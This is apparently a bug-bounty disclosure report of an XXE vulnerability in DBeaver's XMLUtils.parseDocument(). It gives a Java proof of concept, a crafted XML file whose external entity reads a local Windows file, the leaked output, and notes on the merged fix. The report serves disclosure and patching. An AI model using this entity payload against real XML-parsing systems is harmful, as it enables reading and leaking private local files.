Improper Restriction of XML External Entity Reference in dbeaver/dbeaver
Reported on
Sep 29th 2021
✍️ Description
The dbeaver is vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the parseDocument() function in the "XMLUtils.java" file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
🕵️♂️ Proof of Concept
package xxe_poc;
import java.io.File;
import org.jkiss.utils.xml.XMLException;
import org.jkiss.utils.xml.XMLUtils;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
public class Poc {
public static void main(String[] args) {
File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
Document doc;
try {
doc = XMLUtils.parseDocument(file);
doc.getDocumentElement().normalize();
NodeList nodeList = doc.getElementsByTagName("userInfo");
for (int itr = 0; itr < nodeList.getLength(); itr++) {
Node node = nodeList.item(itr);
System.out.println("\nNode Name :" + node.getNodeName());
if (node.getNodeType() == Node.ELEMENT_NODE) {
Element eElement = (Element) node;
System.out.println(
"Last Name: " + eElement.getElementsByTagName("lastName").item(0).getTextContent());
}
}
} catch (XMLException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
sample.xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
Check the Output:
Node Name :userInfo
Last Name: ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
SECURITY.md
2 years ago
@maintainer Please find the patch at https://github.com/srikanthprathi/dbeaver/pull/1
@zidingz The vulnerability got fixed and got merged into the devel branch in the commit https://github.com/dbeaver/dbeaver/commit/82cc6d4a8d306bc227342124238e5646b414b105#diff-6d65066e45a7ded5e705210f51a08551bac55ef424e6fda3e54d053628f78084
Can you please let me know the next step to validate this vulnerability?
Hey Srikanth, thanks for asking.
My advice is to contact the maintainer saying that if he is happy with your contribution, validating the report on huntr would reward you for your efforts. We're happy to support if the maintainer needs help accessing the platform; best place to reach us is on Discord.
Thanks, @Ziding. I have contacted them through their mail: tech-support@dbeaver.com regarding the same.
@dbeaver/dbeaver Thank you very much for validating the reported vulnerability. Can you please accept the patch submitted and been committed?
Thanks again in advance.
